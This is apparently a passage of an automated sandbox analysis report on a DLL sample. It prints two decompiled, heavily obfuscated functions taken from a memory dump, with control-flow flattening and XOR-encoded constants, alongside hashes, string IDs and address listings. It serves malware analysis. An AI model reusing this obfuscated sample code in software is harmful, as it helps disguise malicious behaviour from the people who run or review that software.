                                                                                                          0x02afe0ac
                                                                                                          0x02afe0b4
                                                                                                          0x00000000
                                                                                                          0x02afdfbe
                                                                                                          0x02afdfc4
                                                                                                          0x02afe001
                                                                                                          0x02afe00a
                                                                                                          0x02afe00e
                                                                                                          0x02afe065
                                                                                                          0x02afe082
                                                                                                          0x02afe085
                                                                                                          0x02afe08a
                                                                                                          0x02afe0d6
                                                                                                          0x02afe0d8
                                                                                                          0x02afe0dd
                                                                                                          0x02afdfc6
                                                                                                          0x02afdfcc
                                                                                                          0x02afdffa
                                                                                                          0x00000000
                                                                                                          0x02afdfce
                                                                                                          0x02afdfd4
                                                                                                          0x02afdfda
                                                                                                          0x02afdfe0
                                                                                                          0x02afdfeb
                                                                                                          0x02afdfe8
                                                                                                          0x02afdfe8
                                                                                                          0x02afdfe8
                                                                                                          0x02afdff0
                                                                                                          0x02afdff3
                                                                                                          0x02afdfa5
                                                                                                          0x00000000
                                                                                                          0x02afdfa5
                                                                                                          0x02afdfd4
                                                                                                          0x02afdfcc
                                                                                                          0x02afdfc4
                                                                                                          0x00000000
                                                                                                          0x02afdfb8
                                                                                                          0x02afe0cd
                                                                                                          0x02afe0d4
                                                                                                          0x00000000
                                                                                                          0x02afe0de
                                                                                                          0x02afe0de
                                                                                                          0x02afe0de
                                                                                                          0x02afe0f1
                                                                                                          0x02afe0f1
                                                                                                          0x02afdfa5

                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.704266978.0000000002AE1000.00000020.00000001.sdmp, Offset: 02AE0000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.704223856.0000000002AE0000.00000004.00000001.sdmp Download File
                                                                                                          • Associated: 00000000.00000002.704516476.0000000002B06000.00000004.00000001.sdmp Download File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_2ae0000_loaddll32.jbxd
                                                                                                          Yara matches
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID: .|8$1$41$8+{$H%$fH$s~eP
                                                                                                          • API String ID: 0-3664284304
                                                                                                          • Opcode ID: 082fdb24d8266119a8051b4b0b4fb7c7732caa031b06ed21f4dff2224402d520
                                                                                                          • Instruction ID: e9845a975b6d241de8cedcd5e64910179e501b2ea5f6ccb3faff7d924f7f344c
                                                                                                          • Opcode Fuzzy Hash: 082fdb24d8266119a8051b4b0b4fb7c7732caa031b06ed21f4dff2224402d520
                                                                                                          • Instruction Fuzzy Hash: 88B120725083809FD369CF25D58A90BFBE2FBC4748F10891DF69A86260D7B98949CF47
                                                                                                          Uniqueness

                                                                                                          Uniqueness Score: -1.00%

                                                                                                          Function 02AE670B, Relevance: 9.0, Strings: 7, Instructions: 232COMMONCrypto
                                                                                                          Download Yara Rule
                                                                                                          C-Code - Quality: 97%
                                                                                                          			E02AE670B() {
				char _v524;
				intOrPtr _v548;
				char _v564;
				intOrPtr _v568;
				intOrPtr _v572;
				intOrPtr _v576;
				intOrPtr _v584;
				char _v588;
				signed int _v592;
				signed int _v596;
				signed int _v600;
				signed int _v604;
				signed int _v608;
				signed int _v612;
				signed int _v616;
				signed int _v620;
				signed int _v624;
				signed int _v628;
				signed int _v632;
				signed int _v636;
				signed int _v640;
				signed int _v644;
				signed int _v648;
				signed int _v652;
				signed int _v656;
				signed int _v660;
				signed int _v664;
				signed int _v668;
				signed int _v672;
				signed int _v676;
				signed int _v680;
				void* _t233;
				signed int _t236;
				signed int _t238;
				void* _t239;
				signed int _t241;
				signed int _t242;
				signed int _t243;
				signed int _t244;
				signed int _t258;
				intOrPtr _t259;
				void* _t261;
				void* _t266;
				void* _t268;

				_v576 = 0x5c6bdc;
				_v572 = 0xae866a;
				_t259 = 0;
				_t261 = 0xb8e9ee3;
				_v568 = 0;
				_v612 = 0xec3aec;
				_t5 =  &_v612; // 0xec3aec
				_t241 = 0x62;
				_v612 =  *_t5 * 0x6c;
				_v612 = _v612 | 0xdabeec40;
				_v612 = _v612 ^ 0xfbbeff50;
				_v604 = 0x37b038;
				_v604 = _v604 >> 0xd;
				_v604 = _v604 ^ 0x000001bc;
				_v624 = 0x7f5f56;
				_v624 = _v624 + 0xffff5a99;
				_v624 = _v624 << 4;
				_v624 = _v624 ^ 0x07eb9ef3;
				_v628 = 0x55d92;
				_v628 = _v628 >> 0x10;
				_v628 = _v628 ^ 0x0529ff2d;
				_v628 = _v628 ^ 0x052de72a;
				_v664 = 0x989cfa;
				_v664 = _v664 * 0x6a;
				_v664 = _v664 | 0x8da787ac;
				_v664 = _v664 + 0xffffc08b;
				_v664 = _v664 ^ 0xbfb72d66;
				_v672 = 0x5126c1;
				_v672 = _v672 << 0xa;
				_v672 = _v672 | 0x6300e881;
				_v672 = _v672 * 0x1d;
				_v672 = _v672 ^ 0xbca67a4e;
				_v636 = 0x3defe6;
				_t49 =  &_v636; // 0x3defe6
				_v636 =  *_t49 * 9;
				_t51 =  &_v636; // 0x3defe6
				_v636 =  *_t51 * 0x52;
				_v636 = _v636 ^ 0xb28641ab;
				_v632 = 0xea2077;
				_t56 =  &_v632; // 0xea2077
				_v632 =  *_t56 * 0x65;
				_v632 = _v632 << 2;
				_v632 = _v632 ^ 0x7174f9be;
				_v660 = 0x2cce37;
				_v660 = _v660 << 0xd;
				_v660 = _v660 / _t241;
				_v660 = _v660 << 4;
				_v660 = _v660 ^ 0x1917ca80;
				_v676 = 0x92ca3e;
				_t242 = 0x12;
				_v676 = _v676 * 0x4b;
				_v676 = _v676 << 0xf;
				_v676 = _v676 >> 2;
				_v676 = _v676 ^ 0x28034127;
				_v596 = 0xf7772a;
				_v596 = _v596 + 0xffff3df8;
				_v596 = _v596 ^ 0x00fc52ab;
				_v644 = 0x6698d1;
				_v644 = _v644 | 0xc199dbe0;
				_v644 = _v644 ^ 0xc1fcc133;
				_v592 = 0x7143e7;
				_v592 = _v592 >> 2;
				_v592 = _v592 ^ 0x0010b3e1;
				_v652 = 0x9a4189;
				_v652 = _v652 * 0x60;
				_v652 = _v652 / _t242;
				_v652 = _v652 ^ 0x033cbda1;
				_v668 = 0xc5fab;
				_v668 = _v668 << 0xb;
				_v668 = _v668 >> 9;
				_v668 = _v668 + 0x8f67;
				_v668 = _v668 ^ 0x0031c4ff;
				_v600 = 0x6e8ee8;
				_v600 = _v600 ^ 0x0d880c60;
				_v600 = _v600 ^ 0x0deba949;
				_v616 = 0xb65c97;
				_v616 = _v616 + 0xffff6050;
				_v616 = _v616 << 6;
				_v616 = _v616 ^ 0x2d666d98;
				_v640 = 0xcc6d21;
				_t243 = 0x1b;
				_v640 = _v640 / _t243;
				_v640 = _v640 >> 0xe;
				_v640 = _v640 ^ 0x000eaea1;
				_v680 = 0x87d5f6;
				_t244 = 0x76;
				_v680 = _v680 * 0x1f;
				_v680 = _v680 << 9;
				_v680 = _v680 + 0xffff990b;
				_v680 = _v680 ^ 0xe5dd4258;
				_v608 = 0xe96961;
				_v608 = _v608 | 0xb6f9188e;
				_v608 = _v608 ^ 0xb6fb8930;
				_v656 = 0xc61929;
				_v656 = _v656 >> 2;
				_v656 = _v656 + 0xcacc;
				_v656 = _v656 << 2;
				_v656 = _v656 ^ 0x00c38b27;
				_v648 = 0x21afdf;
				_v648 = _v648 + 0x614;
				_v648 = _v648 + 0x692f;
				_v648 = _v648 ^ 0x002627a2;
				_v620 = 0xc6d0;
				_v620 = _v620 + 0xee3f;
				_t240 = _v608;
				_v620 = _v620 / _t244;
				_v620 = _v620 ^ 0x0005d3ba;
				do {
					while(_t261 != 0x885c2e) {
						if(_t261 == 0x1fa5b7d) {
							_t244 = _v628;
							_t233 = E02B00DB1(_t244,  &_v524, __eflags, _v664, _t244, _v672);
							_t268 = _t268 + 0xc;
							__eflags = _t233;
							if(__eflags != 0) {
								_t261 = 0x6c35f0b;
								continue;
							}
						} else {
							if(_t261 == 0x4edc737) {
								_push(_t244);
								_t236 = E02AFDBC1(_t240, _v652,  &_v564, _t244, _v668, _v600, _v616);
								_t258 = _v680;
								_t244 = _v640;
								asm("sbb esi, esi");
								_t261 = ( ~_t236 & 0xfe84828b) + 0x203d9a3;
								E02B01538(_t244, _t258, _t240);
								_t268 = _t268 + 0x1c;
								goto L14;
							} else {
								if(_t261 == 0x6c35f0b) {
									_t258 = _v636;
									_t244 =  &_v524;
									_t238 = E02B045CA(_t244, _t258, _t244, _t244, _v632, _v660, _v676, _v612, _v596, _v644, _t259, _v592, _v624, _v604);
									_t240 = _t238;
									_t268 = _t268 + 0x30;
									__eflags = _t238 - 0xffffffff;
									if(__eflags != 0) {
										_t261 = 0x4edc737;
										continue;
									}
								} else {
									if(_t261 == 0x8f2e6fb) {
										_t239 = E02AE5477(_t244);
										_t266 = _v588 - _v548;
										asm("sbb ecx, [esp+0x9c]");
										__eflags = _v584 - _t258;
										if(__eflags >= 0) {
											if(__eflags > 0) {
												L19:
												_t259 = 1;
												__eflags = 1;
											} else {
												__eflags = _t266 - _t239;
												if(_t266 >= _t239) {
													goto L19;
												}
											}
										}
									} else {
										if(_t261 != 0xb8e9ee3) {
											goto L14;
										} else {
											_t261 = 0x1fa5b7d;
											continue;
										}
									}
								}
							}
						}
						L20:
						return _t259;
					}
					_t244 = _v608;
					E02AFCA1F(_t244, _v656,  &_v588, _v648, _v620);
					_t268 = _t268 + 0xc;
					_t261 = 0x8f2e6fb;
					L14:
					__eflags = _t261 - 0x203d9a3;
				} while (__eflags != 0);
				goto L20;
			}















































                                                                                                          0x02ae6711
                                                                                                          0x02ae671b
                                                                                                          0x02ae6727
                                                                                                          0x02ae6729
                                                                                                          0x02ae672e
                                                                                                          0x02ae6735
                                                                                                          0x02ae673d
                                                                                                          0x02ae6744
                                                                                                          0x02ae6747
                                                                                                          0x02ae674b
                                                                                                          0x02ae6753
                                                                                                          0x02ae675b
                                                                                                          0x02ae6763
                                                                                                          0x02ae6768
                                                                                                          0x02ae6770
                                                                                                          0x02ae6778
                                                                                                          0x02ae6780
                                                                                                          0x02ae6785
                                                                                                          0x02ae678d
                                                                                                          0x02ae6795
                                                                                                          0x02ae679a
                                                                                                          0x02ae67a2
                                                                                                          0x02ae67aa
                                                                                                          0x02ae67b7
                                                                                                          0x02ae67bb
                                                                                                          0x02ae67c3
                                                                                                          0x02ae67cb
                                                                                                          0x02ae67d3
                                                                                                          0x02ae67db
                                                                                                          0x02ae67e0
                                                                                                          0x02ae67ed
                                                                                                          0x02ae67f1
                                                                                                          0x02ae67f9
                                                                                                          0x02ae6801
                                                                                                          0x02ae6806
                                                                                                          0x02ae680a
                                                                                                          0x02ae680f
                                                                                                          0x02ae6813
                                                                                                          0x02ae681b
                                                                                                          0x02ae6823
                                                                                                          0x02ae6828
                                                                                                          0x02ae682c
                                                                                                          0x02ae6831
                                                                                                          0x02ae6839
                                                                                                          0x02ae6841
                                                                                                          0x02ae684e
                                                                                                          0x02ae6852
                                                                                                          0x02ae6857
                                                                                                          0x02ae685f
                                                                                                          0x02ae686c
                                                                                                          0x02ae686d
                                                                                                          0x02ae6871
                                                                                                          0x02ae6876
                                                                                                          0x02ae687b
                                                                                                          0x02ae6883
                                                                                                          0x02ae688b
                                                                                                          0x02ae6893
                                                                                                          0x02ae689b
                                                                                                          0x02ae68a3
                                                                                                          0x02ae68ab
                                                                                                          0x02ae68b3
                                                                                                          0x02ae68bb
                                                                                                          0x02ae68c0
                                                                                                          0x02ae68c8
                                                                                                          0x02ae68d5
                                                                                                          0x02ae68df
                                                                                                          0x02ae68e5
                                                                                                          0x02ae68f2
                                                                                                          0x02ae68fa
                                                                                                          0x02ae68ff
                                                                                                          0x02ae6904
                                                                                                          0x02ae690c
                                                                                                          0x02ae6914
                                                                                                          0x02ae691c
                                                                                                          0x02ae6924
                                                                                                          0x02ae692c
                                                                                                          0x02ae6934
                                                                                                          0x02ae693c
                                                                                                          0x02ae6941
                                                                                                          0x02ae6949
                                                                                                          0x02ae6957
                                                                                                          0x02ae695c
                                                                                                          0x02ae6962
                                                                                                          0x02ae6967
                                                                                                          0x02ae696f
                                                                                                          0x02ae697c
                                                                                                          0x02ae697d
                                                                                                          0x02ae6981
                                                                                                          0x02ae6986
                                                                                                          0x02ae698e
                                                                                                          0x02ae6996
                                                                                                          0x02ae699e
                                                                                                          0x02ae69a6
                                                                                                          0x02ae69ae
                                                                                                          0x02ae69b6
                                                                                                          0x02ae69bb
                                                                                                          0x02ae69c3
                                                                                                          0x02ae69c8
                                                                                                          0x02ae69d0
                                                                                                          0x02ae69d8
                                                                                                          0x02ae69e0
                                                                                                          0x02ae69e8
                                                                                                          0x02ae69f0
                                                                                                          0x02ae69f8
                                                                                                          0x02ae6a06
                                                                                                          0x02ae6a0a
                                                                                                          0x02ae6a0e
                                                                                                          0x02ae6a16
                                                                                                          0x02ae6a16
                                                                                                          0x02ae6a24
                                                                                                          0x02ae6afb
                                                                                                          0x02ae6aff
                                                                                                          0x02ae6b04
                                                                                                          0x02ae6b07
                                                                                                          0x02ae6b09
                                                                                                          0x02ae6b0b
                                                                                                          0x00000000
                                                                                                          0x02ae6b0b
                                                                                                          0x02ae6a2a
                                                                                                          0x02ae6a30
                                                                                                          0x02ae6aa5
                                                                                                          0x02ae6ac1
                                                                                                          0x02ae6ac6
                                                                                                          0x02ae6acc
                                                                                                          0x02ae6ad3
                                                                                                          0x02ae6adb
                                                                                                          0x02ae6ae1
                                                                                                          0x02ae6ae6
                                                                                                          0x00000000
                                                                                                          0x02ae6a32
                                                                                                          0x02ae6a38
                                                                                                          0x02ae6a7b
                                                                                                          0x02ae6a81
                                                                                                          0x02ae6a88
                                                                                                          0x02ae6a8d
                                                                                                          0x02ae6a8f
                                                                                                          0x02ae6a92
                                                                                                          0x02ae6a95
                                                                                                          0x02ae6a9b
                                                                                                          0x00000000
                                                                                                          0x02ae6a9b
                                                                                                          0x02ae6a3a
                                                                                                          0x02ae6a40
                                                                                                          0x02ae6b45
                                                                                                          0x02ae6b4e
                                                                                                          0x02ae6b59
                                                                                                          0x02ae6b60
                                                                                                          0x02ae6b62
                                                                                                          0x02ae6b64
                                                                                                          0x02ae6b6a
                                                                                                          0x02ae6b6c
                                                                                                          0x02ae6b6c
                                                                                                          0x02ae6b66
                                                                                                          0x02ae6b66
                                                                                                          0x02ae6b68
                                                                                                          0x00000000
                                                                                                          0x00000000
                                                                                                          0x02ae6b68
                                                                                                          0x02ae6b64
                                                                                                          0x02ae6a46
                                                                                                          0x02ae6a4c
                                                                                                          0x00000000
                                                                                                          0x02ae6a52
                                                                                                          0x02ae6a52
                                                                                                          0x00000000
                                                                                                          0x02ae6a52
                                                                                                          0x02ae6a4c
                                                                                                          0x02ae6a40
                                                                                                          0x02ae6a38
                                                                                                          0x02ae6a30
                                                                                                          0x02ae6b6d
                                                                                                          0x02ae6b79
                                                                                                          0x02ae6b79
                                                                                                          0x02ae6b25
                                                                                                          0x02ae6b2a
                                                                                                          0x02ae6b2f
                                                                                                          0x02ae6b32
                                                                                                          0x02ae6b37
                                                                                                          0x02ae6b37
                                                                                                          0x02ae6b37
                                                                                                          0x00000000

                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.704266978.0000000002AE1000.00000020.00000001.sdmp, Offset: 02AE0000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.704223856.0000000002AE0000.00000004.00000001.sdmp Download File
                                                                                                          • Associated: 00000000.00000002.704516476.0000000002B06000.00000004.00000001.sdmp Download File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_2ae0000_loaddll32.jbxd
                                                                                                          Yara matches
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID: /i$?$ai$w $:$Cq$=
                                                                                                          • API String ID: 0-170593755
                                                                                                          • Opcode ID: 6a76146150763d185147f5716e969069fdfaef2cf1abbd44bbf6199f519e4632
                                                                                                          • Instruction ID: a6f9e2c2af2cbef8aa3efcdbc01e89eca80a908b5509e8d64a585e82f82b77c0
                                                                                                          • Opcode Fuzzy Hash: 6a76146150763d185147f5716e969069fdfaef2cf1abbd44bbf6199f519e4632
                                                                                                          • Instruction Fuzzy Hash: 35B120728083809FC768DF65C58950BFBF1BBD4B48F008A1DF5AA96260D7B59949CF43
                                                                                                          Uniqueness

                                                                                                          Uniqueness Score: -1.00%

                                                                                                          Function 02AF4A66, Relevance: 7.8, Strings: 6, Instructions: 269COMMONCrypto
                                                                                                          Download Yara Rule
                                                                                                          C-Code - Quality: 98%
                                                                                                          			E02AF4A66() {
				char _v520;
				intOrPtr _v524;
				intOrPtr _v528;
				intOrPtr _v532;
				signed int _v536;
				signed int _v540;
				signed int _v544;
				signed int _v548;
				signed int _v552;
				signed int _v556;
				signed int _v560;
				signed int _v564;
				signed int _v568;
				signed int _v572;
				signed int _v576;
				signed int _v580;
				signed int _v584;
				signed int _v588;
				signed int _v592;
				signed int _v596;
				signed int _v600;
				signed int _v604;
				signed int _v608;
				signed int _v612;
				signed int _v616;
				signed int _v620;
				signed int _v624;
				signed int _v628;
				signed int _v632;
				signed int _v636;
				signed int _v640;
				void* _t271;
				void* _t272;
				intOrPtr _t277;
				intOrPtr _t283;
				signed int _t285;
				intOrPtr _t287;
				void* _t289;
				intOrPtr _t294;
				intOrPtr _t311;
				signed int _t317;
				signed int _t318;
				signed int _t319;
				signed int _t320;
				signed int _t321;
				signed int _t322;
				signed int _t323;
				intOrPtr _t325;
				signed int* _t327;
				void* _t330;

				_t327 =  &_v640;
				_v532 = 0x9eda53;
				_v528 = 0x2697e4;
				_t289 = 0xd8634eb;
				_t325 = 0;
				_v524 = 0;
				_v580 = 0x257a8f;
				_v580 = _v580 + 0xffff0a69;
				_t317 = 0x46;
				_v580 = _v580 / _t317;
				_v580 = _v580 ^ 0x00008592;
				_v556 = 0x213626;
				_t16 =  &_v556; // 0x213626
				_t318 = 0x3f;
				_v556 =  *_t16 * 0x37;
				_v556 = _v556 ^ 0x0722a203;
				_v564 = 0xc854a8;
				_v564 = _v564 >> 0xd;
				_v564 = _v564 ^ 0x000f067d;
				_v568 = 0x3071d1;
				_v568 = _v568 + 0xffff48c8;
				_v568 = _v568 ^ 0x002621f6;
				_v548 = 0x47fca2;
				_v548 = _v548 ^ 0x7cca96d7;
				_v548 = _v548 ^ 0x7c82555f;
				_v624 = 0xc0bc8e;
				_v624 = _v624 | 0x773eab6a;
				_v624 = _v624 + 0x32c;
				_v624 = _v624 + 0xe315;
				_v624 = _v624 ^ 0x77fb7a9a;
				_v544 = 0x592636;
				_v544 = _v544 << 0xb;
				_v544 = _v544 ^ 0xc9333252;
				_v572 = 0x38b1a;
				_v572 = _v572 ^ 0xe2d962db;
				_v572 = _v572 ^ 0xe2dfc1be;
				_v592 = 0x205e14;
				_v592 = _v592 + 0xffffa7ef;
				_v592 = _v592 + 0xffff7efd;
				_v592 = _v592 ^ 0x001a340d;
				_v540 = 0xa56fb;
				_v540 = _v540 ^ 0x6fafefe0;
				_v540 = _v540 ^ 0x6fae5e5f;
				_v616 = 0x18df03;
				_v616 = _v616 >> 6;
				_v616 = _v616 + 0x4bd4;
				_v616 = _v616 * 0xb;
				_v616 = _v616 ^ 0x000ee45e;
				_v632 = 0xf97e7d;
				_v632 = _v632 >> 0xe;
				_v632 = _v632 << 1;
				_v632 = _v632 >> 8;
				_v632 = _v632 ^ 0x0007c205;
				_v588 = 0x1ac705;
				_v588 = _v588 >> 0xe;
				_v588 = _v588 | 0x5b484d5d;
				_v588 = _v588 ^ 0x5b49b1bf;
				_v608 = 0xcfa712;
				_v608 = _v608 << 0xb;
				_v608 = _v608 + 0xffff02b3;
				_v608 = _v608 / _t318;
				_v608 = _v608 ^ 0x01ff3be8;
				_v600 = 0x40b8c7;
				_v600 = _v600 >> 0xe;
				_v600 = _v600 + 0xffff3f18;
				_v600 = _v600 ^ 0xffff31b4;
				_v560 = 0xb86873;
				_v560 = _v560 * 0x79;
				_v560 = _v560 ^ 0x572fdc31;
				_v596 = 0x3e642a;
				_t319 = 0x51;
				_v596 = _v596 / _t319;
				_t320 = 0x15;
				_v596 = _v596 / _t320;
				_v596 = _v596 ^ 0x00087e57;
				_v636 = 0x2d2a20;
				_t132 =  &_v636; // 0x2d2a20
				_t321 = 0x64;
				_v636 =  *_t132 * 0x60;
				_v636 = _v636 + 0xd33d;
				_v636 = _v636 << 5;
				_v636 = _v636 ^ 0x1e1aa121;
				_v640 = 0xb10dcc;
				_v640 = _v640 | 0xc382035c;
				_v640 = _v640 << 7;
				_v640 = _v640 | 0x409aa621;
				_v640 = _v640 ^ 0xd99a11e4;
				_v584 = 0xf23298;
				_v584 = _v584 / _t321;
				_v584 = _v584 << 0xa;
				_v584 = _v584 ^ 0x09bffa87;
				_v620 = 0xffd84f;
				_v620 = _v620 + 0x561c;
				_v620 = _v620 + 0x86f;
				_v620 = _v620 ^ 0xc18b30ac;
				_v620 = _v620 ^ 0xc08b73c8;
				_v628 = 0x373ddb;
				_v628 = _v628 | 0x384c5e9f;
				_v628 = _v628 >> 0xc;
				_v628 = _v628 + 0xc32f;
				_v628 = _v628 ^ 0x000038bb;
				_v604 = 0xfde248;
				_v604 = _v604 + 0xffff394c;
				_t322 = 0x71;
				_v604 = _v604 * 0xa;
				_v604 = _v604 ^ 0x90dc5ac9;
				_v604 = _v604 ^ 0x99310c60;
				_v576 = 0xeb2acc;
				_v576 = _v576 / _t322;
				_v576 = _v576 >> 0xf;
				_v576 = _v576 ^ 0x000b47a1;
				_v612 = 0xe0e237;
				_t199 =  &_v612; // 0xe0e237
				_t323 = 0x22;
				_v612 =  *_t199 * 0x63;
				_v612 = _v612 << 0xf;
				_v612 = _v612 + 0xffff9396;
				_v612 = _v612 ^ 0xbdacf125;
				_v552 = 0xa3e3d4;
				_t324 = _v536;
				_v552 = _v552 / _t323;
				_v552 = _v552 ^ 0x00068221;
				goto L1;
				do {
					while(1) {
						L1:
						_t330 = _t289 - 0xa9836df;
						if(_t330 > 0) {
							break;
						}
						if(_t330 == 0) {
							E02AE3046(_v616, _v632, _v588, _t324, _v608);
							_t327 =  &(_t327[3]);
							L12:
							_t289 = 0xc26911c;
							continue;
						}
						if(_t289 == 0x7276a71) {
							_v536 = _v580;
							goto L12;
						}
						if(_t289 == 0x85778ce) {
							E02AF07F4();
							_t289 = 0x9029ee2;
							continue;
						}
						if(_t289 == 0x9029ee2) {
							E02B00DB1(_v584,  &_v520, __eflags, _v620, _t289, _v628);
							_t283 = E02AEEFE1(_v576, _v612, _v552,  &_v520);
							_t294 =  *0x2b06214; // 0x0
							 *((intOrPtr*)(_t294 + 4)) = _t283;
							L23:
							return _t325;
						}
						if(_t289 != 0x9959e7d) {
							goto L20;
						}
						_t285 = E02AFE8B6(_t289, _v572, _v592, _t289, _v564, _v540);
						_t324 = _t285;
						_t327 =  &(_t327[4]);
						if(_t285 == 0) {
							_t289 = 0x7276a71;
						} else {
							_t287 =  *0x2b06214; // 0x0
							 *((intOrPtr*)(_t287 + 0x20)) = 1;
							_t289 = 0xdb6aac8;
						}
					}
					__eflags = _t289 - 0xc26911c;
					if(_t289 == 0xc26911c) {
						_t311 =  *0x2b06214; // 0x0
						_t271 = E02AE1A34(_v600, _t311 + 0x34, _t289, _t289, _v560, _v596, _v636, _t289, _v536, _v640);
						_t327 =  &(_t327[8]);
						_t289 = 0x85778ce;
						__eflags = _t271;
						_t272 = 1;
						_t325 =  ==  ? _t272 : _t325;
						goto L20;
					}
					__eflags = _t289 - 0xd8634eb;
					if(_t289 == 0xd8634eb) {
						_push(_t289);
						_push(_t289);
						_t277 = E02AEC5D8(0x444);
						_t327 =  &(_t327[3]);
						 *0x2b06214 = _t277;
						_t289 = 0x9959e7d;
						goto L1;
					}
					__eflags = _t289 - 0xdb6aac8;
					if(__eflags != 0) {
						goto L20;
					}
					_t289 = 0xa9836df;
					_v536 = _v556;
					goto L1;
					L20:
					__eflags = _t289 - 0xdb6d293;
				} while (__eflags != 0);
				goto L23;
			}





















































                                                                                                          0x02af4a66
                                                                                                          0x02af4a6c
                                                                                                          0x02af4a76
                                                                                                          0x02af4a7e
                                                                                                          0x02af4a86
                                                                                                          0x02af4a88
                                                                                                          0x02af4a8f
                                                                                                          0x02af4a97
                                                                                                          0x02af4aa6
                                                                                                          0x02af4aab
                                                                                                          0x02af4ab1
                                                                                                          0x02af4ab9
                                                                                                          0x02af4ac1
                                                                                                          0x02af4ac6
                                                                                                          0x02af4ac7
                                                                                                          0x02af4acb
                                                                                                          0x02af4ad3
                                                                                                          0x02af4adb
                                                                                                          0x02af4ae0
                                                                                                          0x02af4ae8
                                                                                                          0x02af4af0
                                                                                                          0x02af4af8
                                                                                                          0x02af4b00
                                                                                                          0x02af4b08
                                                                                                          0x02af4b10
                                                                                                          0x02af4b18
                                                                                                          0x02af4b20
                                                                                                          0x02af4b28
                                                                                                          0x02af4b30
                                                                                                          0x02af4b38
                                                                                                          0x02af4b40
                                                                                                          0x02af4b48
                                                                                                          0x02af4b4d
                                                                                                          0x02af4b55
                                                                                                          0x02af4b5d
                                                                                                          0x02af4b65
                                                                                                          0x02af4b6d
                                                                                                          0x02af4b75
                                                                                                          0x02af4b7d
                                                                                                          0x02af4b85
                                                                                                          0x02af4b8d
                                                                                                          0x02af4b95
                                                                                                          0x02af4b9d
                                                                                                          0x02af4ba5
                                                                                                          0x02af4bad
                                                                                                          0x02af4bb2
                                                                                                          0x02af4bbf
                                                                                                          0x02af4bc3
                                                                                                          0x02af4bcb
                                                                                                          0x02af4bd3
                                                                                                          0x02af4bd8
                                                                                                          0x02af4bdc
                                                                                                          0x02af4be1
                                                                                                          0x02af4be9
                                                                                                          0x02af4bf1
                                                                                                          0x02af4bf6
                                                                                                          0x02af4bfe
                                                                                                          0x02af4c06
                                                                                                          0x02af4c0e
                                                                                                          0x02af4c13
                                                                                                          0x02af4c21
                                                                                                          0x02af4c25
                                                                                                          0x02af4c2d
                                                                                                          0x02af4c35
                                                                                                          0x02af4c3a
                                                                                                          0x02af4c42
                                                                                                          0x02af4c4a
                                                                                                          0x02af4c57
                                                                                                          0x02af4c5b
                                                                                                          0x02af4c65
                                                                                                          0x02af4c7d
                                                                                                          0x02af4c82
                                                                                                          0x02af4c8c
                                                                                                          0x02af4c91
                                                                                                          0x02af4c97
                                                                                                          0x02af4c9f
                                                                                                          0x02af4ca7
                                                                                                          0x02af4cac
                                                                                                          0x02af4caf
                                                                                                          0x02af4cb3
                                                                                                          0x02af4cbb
                                                                                                          0x02af4cc0
                                                                                                          0x02af4cc8
                                                                                                          0x02af4cd0
                                                                                                          0x02af4cd8
                                                                                                          0x02af4cdd
                                                                                                          0x02af4ce5
                                                                                                          0x02af4ced
                                                                                                          0x02af4cfd
                                                                                                          0x02af4d01
                                                                                                          0x02af4d06
                                                                                                          0x02af4d0e
                                                                                                          0x02af4d16
                                                                                                          0x02af4d1e
                                                                                                          0x02af4d26
                                                                                                          0x02af4d2e
                                                                                                          0x02af4d36
                                                                                                          0x02af4d3e
                                                                                                          0x02af4d46
                                                                                                          0x02af4d4b
                                                                                                          0x02af4d53
                                                                                                          0x02af4d5b
                                                                                                          0x02af4d63
                                                                                                          0x02af4d70
                                                                                                          0x02af4d73
                                                                                                          0x02af4d77
                                                                                                          0x02af4d7f
                                                                                                          0x02af4d87
                                                                                                          0x02af4d97
                                                                                                          0x02af4d9b
                                                                                                          0x02af4da0
                                                                                                          0x02af4da8
                                                                                                          0x02af4db0
                                                                                                          0x02af4db5
                                                                                                          0x02af4db6
                                                                                                          0x02af4dba
                                                                                                          0x02af4dbf
                                                                                                          0x02af4dc7
                                                                                                          0x02af4dcf
                                                                                                          0x02af4ddd
                                                                                                          0x02af4de1
                                                                                                          0x02af4de5
                                                                                                          0x02af4de5
                                                                                                          0x02af4ded
                                                                                                          0x02af4ded
                                                                                                          0x02af4ded
                                                                                                          0x02af4ded
                                                                                                          0x02af4def
                                                                                                          0x00000000
                                                                                                          0x00000000
                                                                                                          0x02af4df5
                                                                                                          0x02af4e83
                                                                                                          0x02af4e88
                                                                                                          0x02af4e6b
                                                                                                          0x02af4e6b
                                                                                                          0x00000000
                                                                                                          0x02af4e6b
                                                                                                          0x02af4dfd
                                                                                                          0x02af4e67
                                                                                                          0x00000000
                                                                                                          0x02af4e67
                                                                                                          0x02af4e05
                                                                                                          0x02af4e57
                                                                                                          0x02af4e5c
                                                                                                          0x00000000
                                                                                                          0x02af4e5c
                                                                                                          0x02af4e0d
                                                                                                          0x02af4f39
                                                                                                          0x02af4f56
                                                                                                          0x02af4f5b
                                                                                                          0x02af4f64
                                                                                                          0x02af4f68
                                                                                                          0x02af4f73
                                                                                                          0x02af4f73
                                                                                                          0x02af4e19
                                                                                                          0x00000000
                                                                                                          0x00000000
                                                                                                          0x02af4e30
                                                                                                          0x02af4e35
                                                                                                          0x02af4e37
                                                                                                          0x02af4e3c
                                                                                                          0x02af4e50
                                                                                                          0x02af4e3e
                                                                                                          0x02af4e3e
                                                                                                          0x02af4e46
                                                                                                          0x02af4e49
                                                                                                          0x02af4e49
                                                                                                          0x02af4e3c
                                                                                                          0x02af4e8d
                                                                                                          0x02af4e8f
                                                                                                          0x02af4ef3
                                                                                                          0x02af4f02
                                                                                                          0x02af4f07
                                                                                                          0x02af4f0a
                                                                                                          0x02af4f0f
                                                                                                          0x02af4f13
                                                                                                          0x02af4f14
                                                                                                          0x00000000
                                                                                                          0x02af4f14
                                                                                                          0x02af4e91
                                                                                                          0x02af4e97
                                                                                                          0x02af4ec0
                                                                                                          0x02af4ec1
                                                                                                          0x02af4ec7
                                                                                                          0x02af4ecc
                                                                                                          0x02af4ecf
                                                                                                          0x02af4ed4
                                                                                                          0x00000000
                                                                                                          0x02af4ed4
